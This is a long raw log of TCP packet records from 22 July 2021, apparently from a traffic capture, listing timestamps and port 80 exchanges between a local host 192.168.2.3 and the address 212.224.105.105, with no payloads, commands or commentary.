Jul 22, 2021 11:44:12.612040997 CEST	49742	80	192.168.2.3	212.224.105.105
Jul 22, 2021 11:44:12.612246990 CEST	80	49742	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.612263918 CEST	80	49742	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.612334967 CEST	49742	80	192.168.2.3	212.224.105.105
Jul 22, 2021 11:44:12.612390995 CEST	49742	80	192.168.2.3	212.224.105.105
Jul 22, 2021 11:44:12.612438917 CEST	80	49742	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.612554073 CEST	49742	80	192.168.2.3	212.224.105.105
Jul 22, 2021 11:44:12.612837076 CEST	80	49742	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.612983942 CEST	49742	80	192.168.2.3	212.224.105.105
Jul 22, 2021 11:44:12.652472019 CEST	80	49742	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.652520895 CEST	80	49742	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.652571917 CEST	49742	80	192.168.2.3	212.224.105.105
Jul 22, 2021 11:44:12.652631998 CEST	49742	80	192.168.2.3	212.224.105.105
Jul 22, 2021 11:44:12.659332037 CEST	80	49742	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.659369946 CEST	80	49742	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.659394979 CEST	80	49742	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.659434080 CEST	49742	80	192.168.2.3	212.224.105.105
Jul 22, 2021 11:44:12.659502029 CEST	49742	80	192.168.2.3	212.224.105.105
Jul 22, 2021 11:44:12.659522057 CEST	49742	80	192.168.2.3	212.224.105.105
Jul 22, 2021 11:44:12.659549952 CEST	80	49742	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.659610987 CEST	80	49742	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.659636021 CEST	49742	80	192.168.2.3	212.224.105.105
Jul 22, 2021 11:44:12.659719944 CEST	49742	80	192.168.2.3	212.224.105.105
Jul 22, 2021 11:44:12.660041094 CEST	80	49742	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.660068989 CEST	80	49742	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.660103083 CEST	49742	80	192.168.2.3	212.224.105.105
Jul 22, 2021 11:44:12.660149097 CEST	49742	80	192.168.2.3	212.224.105.105
Jul 22, 2021 11:44:12.660644054 CEST	80	49742	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.660711050 CEST	49742	80	192.168.2.3	212.224.105.105
Jul 22, 2021 11:44:12.660856009 CEST	80	49742	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.660916090 CEST	49742	80	192.168.2.3	212.224.105.105
Jul 22, 2021 11:44:12.661040068 CEST	80	49742	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.661140919 CEST	49742	80	192.168.2.3	212.224.105.105
Jul 22, 2021 11:44:12.661923885 CEST	80	49742	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.662025928 CEST	49742	80	192.168.2.3	212.224.105.105
Jul 22, 2021 11:44:12.700032949 CEST	80	49742	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.700073957 CEST	80	49742	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.700098038 CEST	80	49742	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.700139046 CEST	49742	80	192.168.2.3	212.224.105.105
Jul 22, 2021 11:44:12.700191975 CEST	49742	80	192.168.2.3	212.224.105.105
Jul 22, 2021 11:44:12.708436966 CEST	80	49742	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.708472967 CEST	80	49742	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.708559990 CEST	80	49742	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.708561897 CEST	49742	80	192.168.2.3	212.224.105.105
Jul 22, 2021 11:44:12.708619118 CEST	49742	80	192.168.2.3	212.224.105.105
Jul 22, 2021 11:44:12.708678007 CEST	49742	80	192.168.2.3	212.224.105.105
Jul 22, 2021 11:44:12.708739042 CEST	80	49742	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.708823919 CEST	49742	80	192.168.2.3	212.224.105.105
Jul 22, 2021 11:44:12.708913088 CEST	80	49742	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.709017038 CEST	49742	80	192.168.2.3	212.224.105.105
Jul 22, 2021 11:44:12.709153891 CEST	80	49742	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.709180117 CEST	80	49742	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.709223032 CEST	49742	80	192.168.2.3	212.224.105.105
Jul 22, 2021 11:44:12.709269047 CEST	49742	80	192.168.2.3	212.224.105.105
Jul 22, 2021 11:44:12.709348917 CEST	80	49742	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.709455967 CEST	49742	80	192.168.2.3	212.224.105.105
Jul 22, 2021 11:44:12.709988117 CEST	80	49742	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.710086107 CEST	49742	80	192.168.2.3	212.224.105.105
Jul 22, 2021 11:44:12.710206032 CEST	80	49742	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.710277081 CEST	49742	80	192.168.2.3	212.224.105.105
Jul 22, 2021 11:44:12.710347891 CEST	80	49742	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.710443974 CEST	49742	80	192.168.2.3	212.224.105.105
Jul 22, 2021 11:44:12.710553885 CEST	80	49742	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.710692883 CEST	49742	80	192.168.2.3	212.224.105.105
Jul 22, 2021 11:44:12.711327076 CEST	80	49742	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.711474895 CEST	49742	80	192.168.2.3	212.224.105.105
Jul 22, 2021 11:44:12.711747885 CEST	80	49742	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.711884022 CEST	49742	80	192.168.2.3	212.224.105.105
Jul 22, 2021 11:44:12.712181091 CEST	80	49742	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.712412119 CEST	49742	80	192.168.2.3	212.224.105.105
Jul 22, 2021 11:44:12.713262081 CEST	80	49742	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.713383913 CEST	49742	80	192.168.2.3	212.224.105.105
Jul 22, 2021 11:44:12.713937998 CEST	80	49742	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.714066982 CEST	49742	80	192.168.2.3	212.224.105.105
Jul 22, 2021 11:44:12.714711905 CEST	80	49742	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.714850903 CEST	49742	80	192.168.2.3	212.224.105.105
Jul 22, 2021 11:44:12.747502089 CEST	80	49742	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.747565985 CEST	80	49742	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.747611046 CEST	80	49742	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.747632980 CEST	49742	80	192.168.2.3	212.224.105.105
Jul 22, 2021 11:44:12.747647047 CEST	80	49742	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.747695923 CEST	49742	80	192.168.2.3	212.224.105.105
Jul 22, 2021 11:44:12.747764111 CEST	49742	80	192.168.2.3	212.224.105.105
Jul 22, 2021 11:44:12.755736113 CEST	80	49742	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.755846977 CEST	49742	80	192.168.2.3	212.224.105.105
Jul 22, 2021 11:44:12.755923033 CEST	80	49742	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.755947113 CEST	80	49742	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.756009102 CEST	49742	80	192.168.2.3	212.224.105.105
Jul 22, 2021 11:44:12.756009102 CEST	80	49742	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.756023884 CEST	49742	80	192.168.2.3	212.224.105.105
Jul 22, 2021 11:44:12.756033897 CEST	80	49742	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.756081104 CEST	49742	80	192.168.2.3	212.224.105.105
Jul 22, 2021 11:44:12.756108999 CEST	49742	80	192.168.2.3	212.224.105.105
Jul 22, 2021 11:44:12.756525993 CEST	80	49742	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.756603956 CEST	49742	80	192.168.2.3	212.224.105.105
Jul 22, 2021 11:44:12.756704092 CEST	80	49742	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.756779909 CEST	49742	80	192.168.2.3	212.224.105.105
Jul 22, 2021 11:44:12.756795883 CEST	80	49742	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.756871939 CEST	49742	80	192.168.2.3	212.224.105.105
Jul 22, 2021 11:44:12.756876945 CEST	80	49742	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.756987095 CEST	49742	80	192.168.2.3	212.224.105.105
Jul 22, 2021 11:44:12.757292032 CEST	80	49742	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.757378101 CEST	49742	80	192.168.2.3	212.224.105.105
Jul 22, 2021 11:44:12.757570982 CEST	80	49742	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.757719994 CEST	49742	80	192.168.2.3	212.224.105.105
Jul 22, 2021 11:44:12.757739067 CEST	80	49742	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.757846117 CEST	49742	80	192.168.2.3	212.224.105.105
Jul 22, 2021 11:44:12.757980108 CEST	80	49742	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.758080006 CEST	49742	80	192.168.2.3	212.224.105.105
Jul 22, 2021 11:44:12.758519888 CEST	80	49742	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.758637905 CEST	49742	80	192.168.2.3	212.224.105.105
Jul 22, 2021 11:44:12.759056091 CEST	80	49742	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.759150982 CEST	49742	80	192.168.2.3	212.224.105.105
Jul 22, 2021 11:44:12.759568930 CEST	80	49742	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.759646893 CEST	49742	80	192.168.2.3	212.224.105.105
Jul 22, 2021 11:44:12.759727001 CEST	80	49742	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.759804964 CEST	49742	80	192.168.2.3	212.224.105.105
Jul 22, 2021 11:44:12.759922981 CEST	80	49742	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.760091066 CEST	49742	80	192.168.2.3	212.224.105.105
Jul 22, 2021 11:44:12.760901928 CEST	80	49742	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.761074066 CEST	49742	80	192.168.2.3	212.224.105.105
Jul 22, 2021 11:44:12.761261940 CEST	80	49742	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.761429071 CEST	49742	80	192.168.2.3	212.224.105.105
Jul 22, 2021 11:44:12.761698961 CEST	80	49742	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.761840105 CEST	49742	80	192.168.2.3	212.224.105.105
Jul 22, 2021 11:44:12.762562037 CEST	80	49742	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.762691021 CEST	49742	80	192.168.2.3	212.224.105.105
Jul 22, 2021 11:44:12.763223886 CEST	80	49742	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.763328075 CEST	49742	80	192.168.2.3	212.224.105.105
Jul 22, 2021 11:44:12.763377905 CEST	80	49742	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.763618946 CEST	80	49742	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.763621092 CEST	49742	80	192.168.2.3	212.224.105.105
Jul 22, 2021 11:44:12.763745070 CEST	49742	80	192.168.2.3	212.224.105.105
Jul 22, 2021 11:44:12.764139891 CEST	80	49742	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.764260054 CEST	80	49742	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.764262915 CEST	49742	80	192.168.2.3	212.224.105.105
Jul 22, 2021 11:44:12.764342070 CEST	49742	80	192.168.2.3	212.224.105.105
Jul 22, 2021 11:44:12.764417887 CEST	49742	80	192.168.2.3	212.224.105.105
Jul 22, 2021 11:44:12.765369892 CEST	80	49742	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.765475988 CEST	80	49742	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.765501022 CEST	49742	80	192.168.2.3	212.224.105.105
Jul 22, 2021 11:44:12.765583992 CEST	49742	80	192.168.2.3	212.224.105.105
Jul 22, 2021 11:44:12.765877962 CEST	80	49742	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.765978098 CEST	49742	80	192.168.2.3	212.224.105.105
Jul 22, 2021 11:44:12.766231060 CEST	80	49742	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.766324997 CEST	49742	80	192.168.2.3	212.224.105.105
Jul 22, 2021 11:44:12.766520977 CEST	80	49742	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.766640902 CEST	80	49742	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.766689062 CEST	49742	80	192.168.2.3	212.224.105.105
Jul 22, 2021 11:44:12.766763926 CEST	49742	80	192.168.2.3	212.224.105.105
Jul 22, 2021 11:44:12.766872883 CEST	80	49742	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.766982079 CEST	49742	80	192.168.2.3	212.224.105.105
Jul 22, 2021 11:44:12.767107010 CEST	80	49742	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.767247915 CEST	49742	80	192.168.2.3	212.224.105.105
Jul 22, 2021 11:44:12.767630100 CEST	80	49742	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.767771959 CEST	49742	80	192.168.2.3	212.224.105.105
Jul 22, 2021 11:44:12.767962933 CEST	80	49742	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.768033981 CEST	49742	80	192.168.2.3	212.224.105.105
Jul 22, 2021 11:44:12.768313885 CEST	80	49742	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.768407106 CEST	49742	80	192.168.2.3	212.224.105.105
Jul 22, 2021 11:44:12.768490076 CEST	80	49742	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.768541098 CEST	49742	80	192.168.2.3	212.224.105.105
Jul 22, 2021 11:44:12.768563032 CEST	80	49742	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.768639088 CEST	49742	80	192.168.2.3	212.224.105.105
Jul 22, 2021 11:44:12.768685102 CEST	80	49742	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.768744946 CEST	49742	80	192.168.2.3	212.224.105.105
Jul 22, 2021 11:44:12.768804073 CEST	80	49742	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.768914938 CEST	49742	80	192.168.2.3	212.224.105.105
Jul 22, 2021 11:44:12.794895887 CEST	80	49742	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.794948101 CEST	80	49742	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.794982910 CEST	80	49742	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.795036077 CEST	49742	80	192.168.2.3	212.224.105.105
Jul 22, 2021 11:44:12.795125008 CEST	49742	80	192.168.2.3	212.224.105.105
Jul 22, 2021 11:44:12.795382977 CEST	80	49742	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.795484066 CEST	49742	80	192.168.2.3	212.224.105.105
Jul 22, 2021 11:44:12.795559883 CEST	80	49742	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.795645952 CEST	49742	80	192.168.2.3	212.224.105.105
Jul 22, 2021 11:44:12.795789957 CEST	80	49742	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.795914888 CEST	49742	80	192.168.2.3	212.224.105.105
Jul 22, 2021 11:44:12.804625988 CEST	80	49742	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.804673910 CEST	80	49742	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.804709911 CEST	80	49742	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.804718018 CEST	49742	80	192.168.2.3	212.224.105.105
Jul 22, 2021 11:44:12.804757118 CEST	49742	80	192.168.2.3	212.224.105.105
Jul 22, 2021 11:44:12.804788113 CEST	80	49742	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.804809093 CEST	49742	80	192.168.2.3	212.224.105.105
Jul 22, 2021 11:44:12.804867983 CEST	49742	80	192.168.2.3	212.224.105.105
Jul 22, 2021 11:44:12.805090904 CEST	80	49742	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.805128098 CEST	80	49742	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.805217981 CEST	80	49742	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.805223942 CEST	49742	80	192.168.2.3	212.224.105.105
Jul 22, 2021 11:44:12.805316925 CEST	49742	80	192.168.2.3	212.224.105.105
Jul 22, 2021 11:44:12.805349112 CEST	49742	80	192.168.2.3	212.224.105.105
Jul 22, 2021 11:44:12.806153059 CEST	80	49742	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.806242943 CEST	80	49742	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.806245089 CEST	49742	80	192.168.2.3	212.224.105.105
Jul 22, 2021 11:44:12.806324005 CEST	49742	80	192.168.2.3	212.224.105.105
Jul 22, 2021 11:44:12.806569099 CEST	80	49742	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.806641102 CEST	49742	80	192.168.2.3	212.224.105.105
Jul 22, 2021 11:44:12.806751966 CEST	80	49742	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.806829929 CEST	49742	80	192.168.2.3	212.224.105.105
Jul 22, 2021 11:44:12.807018995 CEST	80	49742	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.807106018 CEST	49742	80	192.168.2.3	212.224.105.105
Jul 22, 2021 11:44:12.807367086 CEST	80	49742	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.807487011 CEST	49742	80	192.168.2.3	212.224.105.105
Jul 22, 2021 11:44:12.807877064 CEST	80	49742	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.807975054 CEST	49742	80	192.168.2.3	212.224.105.105
Jul 22, 2021 11:44:12.808310032 CEST	80	49742	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.808402061 CEST	49742	80	192.168.2.3	212.224.105.105
Jul 22, 2021 11:44:12.808741093 CEST	80	49742	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.808820963 CEST	49742	80	192.168.2.3	212.224.105.105
Jul 22, 2021 11:44:12.809174061 CEST	80	49742	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.809273958 CEST	49742	80	192.168.2.3	212.224.105.105
Jul 22, 2021 11:44:12.810029030 CEST	80	49742	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.810116053 CEST	49742	80	192.168.2.3	212.224.105.105
Jul 22, 2021 11:44:12.810453892 CEST	80	49742	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.810534000 CEST	49742	80	192.168.2.3	212.224.105.105
Jul 22, 2021 11:44:12.810559988 CEST	80	49742	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.810648918 CEST	49742	80	192.168.2.3	212.224.105.105
Jul 22, 2021 11:44:12.811062098 CEST	80	49742	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.811153889 CEST	49742	80	192.168.2.3	212.224.105.105
Jul 22, 2021 11:44:12.811356068 CEST	80	49742	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.811420918 CEST	49742	80	192.168.2.3	212.224.105.105
Jul 22, 2021 11:44:12.811544895 CEST	80	49742	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.811624050 CEST	49742	80	192.168.2.3	212.224.105.105
Jul 22, 2021 11:44:12.811819077 CEST	80	49742	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.811891079 CEST	49742	80	192.168.2.3	212.224.105.105
Jul 22, 2021 11:44:12.812179089 CEST	80	49742	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.812257051 CEST	49742	80	192.168.2.3	212.224.105.105
Jul 22, 2021 11:44:12.812495947 CEST	80	49742	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.812566042 CEST	49742	80	192.168.2.3	212.224.105.105
Jul 22, 2021 11:44:12.812728882 CEST	80	49742	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.812808037 CEST	49742	80	192.168.2.3	212.224.105.105
Jul 22, 2021 11:44:12.812952995 CEST	80	49742	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.813018084 CEST	49742	80	192.168.2.3	212.224.105.105
Jul 22, 2021 11:44:12.813086033 CEST	80	49742	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.813165903 CEST	49742	80	192.168.2.3	212.224.105.105
Jul 22, 2021 11:44:12.813507080 CEST	80	49742	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.813582897 CEST	49742	80	192.168.2.3	212.224.105.105
Jul 22, 2021 11:44:12.813872099 CEST	80	49742	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.813951015 CEST	49742	80	192.168.2.3	212.224.105.105
Jul 22, 2021 11:44:12.814382076 CEST	80	49742	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.814455986 CEST	49742	80	192.168.2.3	212.224.105.105
Jul 22, 2021 11:44:12.814466000 CEST	80	49742	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.814539909 CEST	49742	80	192.168.2.3	212.224.105.105
Jul 22, 2021 11:44:12.814934969 CEST	80	49742	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.815020084 CEST	49742	80	192.168.2.3	212.224.105.105
Jul 22, 2021 11:44:12.815382957 CEST	80	49742	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.815469027 CEST	49742	80	192.168.2.3	212.224.105.105
Jul 22, 2021 11:44:12.815700054 CEST	80	49742	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.815779924 CEST	49742	80	192.168.2.3	212.224.105.105
Jul 22, 2021 11:44:12.816056013 CEST	80	49742	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.816127062 CEST	49742	80	192.168.2.3	212.224.105.105
Jul 22, 2021 11:44:12.816459894 CEST	80	49742	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.816543102 CEST	49742	80	192.168.2.3	212.224.105.105
Jul 22, 2021 11:44:12.816895008 CEST	80	49742	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.816967964 CEST	49742	80	192.168.2.3	212.224.105.105
Jul 22, 2021 11:44:12.817310095 CEST	80	49742	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.817395926 CEST	49742	80	192.168.2.3	212.224.105.105
Jul 22, 2021 11:44:12.817945957 CEST	80	49742	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.818034887 CEST	49742	80	192.168.2.3	212.224.105.105
Jul 22, 2021 11:44:12.818308115 CEST	80	49742	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.818825960 CEST	80	49742	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.819017887 CEST	80	49742	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.819262981 CEST	80	49742	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.819576979 CEST	80	49742	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.819916010 CEST	80	49742	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.820466042 CEST	80	49742	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.820866108 CEST	80	49742	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.821186066 CEST	80	49742	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.821674109 CEST	80	49742	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.822113991 CEST	80	49742	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.822624922 CEST	80	49742	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.823065996 CEST	80	49742	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.823513031 CEST	80	49742	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.823827982 CEST	80	49742	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.823848009 CEST	80	49742	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.824174881 CEST	80	49742	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.824496984 CEST	80	49742	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.824774981 CEST	80	49742	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.825335979 CEST	80	49742	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.825582027 CEST	80	49742	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.826000929 CEST	80	49742	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.826219082 CEST	80	49742	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.826457024 CEST	80	49742	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.826658010 CEST	80	49742	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.826924086 CEST	80	49742	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.827095985 CEST	80	49742	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.827536106 CEST	80	49742	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.827780008 CEST	80	49742	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.828187943 CEST	80	49742	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.828373909 CEST	80	49742	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.828825951 CEST	80	49742	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.829427004 CEST	80	49742	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.829948902 CEST	80	49742	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.830148935 CEST	80	49742	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.830339909 CEST	80	49742	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.830670118 CEST	80	49742	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.831285954 CEST	80	49742	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.832273006 CEST	80	49742	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.842489958 CEST	80	49742	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.842533112 CEST	80	49742	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.842576027 CEST	80	49742	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.842937946 CEST	80	49742	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.843259096 CEST	80	49742	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.843523979 CEST	80	49742	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.843862057 CEST	80	49742	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.844398975 CEST	80	49742	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.844893932 CEST	80	49742	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.845280886 CEST	80	49742	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.852077007 CEST	80	49742	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.852107048 CEST	80	49742	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.852340937 CEST	80	49742	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.852386951 CEST	80	49742	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.855257988 CEST	80	49742	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.855278969 CEST	80	49742	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.855288982 CEST	80	49742	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.855309963 CEST	80	49742	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.855319977 CEST	80	49742	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.855329990 CEST	80	49742	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.855339050 CEST	80	49742	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.855348110 CEST	80	49742	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.855356932 CEST	80	49742	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.855473995 CEST	80	49742	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.856627941 CEST	80	49742	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.856641054 CEST	80	49742	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.856650114 CEST	80	49742	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.856954098 CEST	80	49742	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.857189894 CEST	80	49742	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.857631922 CEST	80	49742	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.857908964 CEST	80	49742	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.858247995 CEST	80	49742	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.858724117 CEST	80	49742	212.224.105.105	192.168.2.3
